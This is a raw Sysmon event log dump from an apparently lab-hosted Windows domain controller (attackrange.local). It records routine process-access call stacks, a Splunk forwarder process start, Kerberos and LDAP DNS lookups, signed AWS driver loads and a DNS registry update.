13:53:35.851{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002670Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:35.851{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002669Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:35.851{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002668Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:35.851{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002667Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:35.851{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002666Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:35.851{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002665Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:35.851{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002664Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:35.851{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-855F-5FCF-7E00-000000009101}2916C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002663Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:35.851{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-855F-5FCF-7E00-000000009101}2916C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002662Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:35.639{10ACEC4A-855F-5FCF-7E00-000000009101}2916C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000002661Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.289{10ACEC4A-8541-5FCF-1200-000000009101}1212wpad1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002660Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.231{10ACEC4A-8551-5FCF-2E00-000000009101}2212win-dc-9350fe80::f48a:7e9b:8cc9:e855;::ffff:10.0.1.14;C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe 22542200x80000000000000002659Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.039{10ACEC4A-853E-5FCF-0B00-000000009101}864_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.ATTACKRANGE.LOCAL.1460-C:\Windows\System32\lsass.exe 22542200x80000000000000002658Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:33.383{10ACEC4A-853E-5FCF-0B00-000000009101}864_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.1460-C:\Windows\System32\lsass.exe 22542200x80000000000000002657Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:33.367{10ACEC4A-853E-5FCF-0B00-000000009101}864_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.1460-C:\Windows\System32\lsass.exe 10341000x80000000000000002656Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:35.132{10ACEC4A-855E-5FCF-7D00-000000009101}6524008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+577205|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+576d36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+56c09|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+572d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+8fe2c4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002655Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:35.054{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002654Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:35.054{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002653Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:35.039{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002652Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:35.039{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002651Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:35.039{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002650Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:35.008{10ACEC4A-853E-5FCF-0B00-000000009101}8643528C:\Windows\system32\lsass.exe{10ACEC4A-853D-5FCF-0100-000000009101}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+70fae|C:\Windows\system32\lsass.exe+3907|C:\Windows\SYSTEM32\ntdll.dll+803e4|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 644600x80000000000000002677Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:01.274C:\Windows\System32\drivers\xenvbd.sysMD5=8278E2B5383D2F5ED2583AC10E68E82C,SHA256=31DC4BF6BD29D3AED3588FE5A843BBD6EB6FF9D835555F7107768BA5F4E4326D,IMPHASH=B32CBE28AF26D0BACA98C88509F8A67CtrueAmazon Web Services, Inc.Valid 644600x80000000000000002676Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.368C:\Windows\System32\drivers\xenvbd.sysMD5=8278E2B5383D2F5ED2583AC10E68E82C,SHA256=31DC4BF6BD29D3AED3588FE5A843BBD6EB6FF9D835555F7107768BA5F4E4326D,IMPHASH=B32CBE28AF26D0BACA98C88509F8A67CtrueAmazon Web Services, Inc.Valid 644600x80000000000000002675Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:01.274C:\Windows\System32\drivers\xencrsh.sysMD5=8498E8240422067AF19398BA0C9E71BD,SHA256=8763BD78E6D2A5C4974EE2C917069C212FA6B5E138B1DFAF3D923EC7BDA8CCE0,IMPHASH=5A51E368D0D191BA922C89AD12551EF4trueAmazon Web Services, Inc.Valid 10341000x80000000000000002680Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:40.101{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002679Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:40.101{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002678Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:40.101{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002685Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:44.788{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exeHKLM\System\CurrentControlSet\Services\DNS\Parameters\PreviousLocalHostnamewin-dc-935.attackrange.local 10341000x80000000000000002684Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:44.788{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000002683Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:44.695{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002682Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 